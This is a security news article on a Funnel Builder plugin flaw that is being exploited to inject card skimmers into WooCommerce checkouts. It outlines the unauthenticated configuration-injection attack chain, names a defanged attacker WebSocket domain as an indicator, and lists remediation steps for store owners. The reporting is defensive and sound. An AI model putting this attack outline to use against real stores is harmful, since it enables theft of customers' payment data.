WooCommerce Stores Under Attack via Funnel Builder Flaw

A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject credit card skimmers on WooCommerce checkout pages. Security researchers at Sansec published details of the campaign this week after observing attackers targeting more than 40,000 online stores running the vulnerable plugin.

The flaw allows unauthenticated attackers to write arbitrary JavaScript directly into the plugin's global settings. That injected code then executes on every checkout page, silently capturing payment details and exfiltrating them to attacker-controlled infrastructure.

How Attackers Are Exploiting the Flaw

The vulnerability exists in a publicly exposed checkout endpoint that lacks proper permission validation. Attackers can issue unauthenticated HTTP requests that reach an internal method capable of modifying the plugin's configuration without any authorization checks.

Once inside, the attack chain works like this:

1. Initial access: Attacker sends crafted request to vulnerable endpoint
2. Configuration injection: Malicious JavaScript written to the plugin's "External Scripts" setting
3. Persistent skimming: Code executes on every Funnel Builder checkout page automatically
4. Data exfiltration: Skimmer opens WebSocket connection to wss://protect-wss[.]com/ws to retrieve additional payloads and transmit stolen data

The attackers plant code disguised as legitimate Google Tag Manager scripts—a common technique for blending malicious activity with expected analytics traffic. The final payload harvests credit card numbers, CVVs, billing addresses, and any other information entered at checkout.

Which Stores Are Affected

Funnel Builder is a popular sales funnel and landing page builder for WooCommerce, used by over 40,000 active installations. Any store running versions before 3.15.0.3 is vulnerable.

The attack is particularly insidious because it requires no user interaction beyond normal checkout behavior. Customers have no way to detect the skimmer—the malicious code runs invisibly alongside legitimate page functionality.

This campaign continues a broader trend of payment-focused WordPress attacks. Earlier this year, we covered similar exploitation patterns targeting WooCommerce stores, where attackers combined multiple access vectors to extract customer payment data at scale.

Immediate Actions for Store Owners

FunnelKit, the company behind Funnel Builder, has released version 3.15.0.3 to address the vulnerability. Store owners should:

1. Update immediately to Funnel Builder 3.15.0.3 or later
2. Audit your External Scripts setting — Navigate to Settings > Checkout > External Scripts and remove any unfamiliar code
3. Search for suspicious domains — Look for references to protect-wss.com or other unfamiliar WebSocket endpoints
4. Review transaction logs — Check for unauthorized transactions or customer complaints about fraud
5. Consider notifying affected customers if you find evidence of compromise

For guidance on recognizing suspicious scripts, see our phishing email examples guide which covers common attacker techniques for disguising malicious payloads.

The Magecart Problem Won't Go Away

Payment skimming attacks—often grouped under the "Magecart" umbrella—remain one of the most persistent threats to e-commerce. Unlike ransomware that announces its presence, skimmers operate silently, sometimes for months before detection.

The attack model works because:

• E-commerce platforms run complex plugin ecosystems with varying security quality
• Store owners often lack security expertise to audit their installations
• Payment data offers immediate monetization through fraud or resale
• Attribution is difficult when attacks route through multiple compromised hosts

Organizations managing WooCommerce deployments should implement regular security audits, monitor for unauthorized configuration changes, and consider web application firewalls capable of detecting injection attempts. The OWASP guide to Magecart attacks provides additional hardening recommendations.

Supply chain attacks targeting developer tools show similar patterns—the recent node-ipc compromise demonstrated how attackers increasingly target the software distribution channels themselves rather than individual deployments.